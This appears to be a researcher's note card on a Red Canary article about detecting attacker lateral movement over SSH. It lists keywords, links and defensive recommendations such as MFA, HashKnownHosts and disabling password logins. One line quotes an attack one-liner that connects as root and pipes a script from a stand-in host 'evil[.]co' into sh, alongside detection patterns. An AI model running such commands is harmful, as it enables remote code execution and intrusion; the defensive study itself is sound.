lateralmovementssh-lambert2020

2025-11-02

Lateral Movement with Secure Shell (SSH)

By: Tony Lambert

April 28, 2020

Red Canary

https://redcanary.com/blog/threat-detection/lateral-movement-with-secure-shell/

Notes
Red Canary
Zscaler
SSH
SSH malware
lateral movement
PsExec https://redcanary.com/blog/threat-detection/threat-hunting-psexec-lateral-movement/
https://redcanary.com/blog/threat-detection/stopping-emotet-before-it-moves-laterally/
Unix-like
SMB
RDP
OpenSSH
ssh command
Telnet
scp command
sftp command
FTP
ftp command
password authentication
ssh-keygen
authorized_keys
known_hosts
brute force
weak password
port 22
public key
sshd
SSH tunneling
bypassingnetworkrestrictionrdptunneling-mandiant2019
plink.exe
cli pattern detection: 127.0.0.1:3389
firewall
Evasion
MySQL
cryptocurrency miner
Linux malware
known_hosts as a host discovery tool for lateral movement
EDR
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no root@10.10.10.10 'hxxp://evil[.]co/evilScript \ sh
YARA
VirusTotal LiveHunt
dropper script yara rule
curl -> sh
https://azure.microsoft.com/en-us/blog/learning-from-cryptocurrency-mining-attack-scripts-on-linux/
base64 as evasion technique
authorized_keys persistence
MFA
recommendation: enable MFA
HashKnownHosts
recommendation: use HashKnownHosts
recommendation: disable password authentication for SSH servers
https://goteleport.com/blog/how-to-ssh-properly/
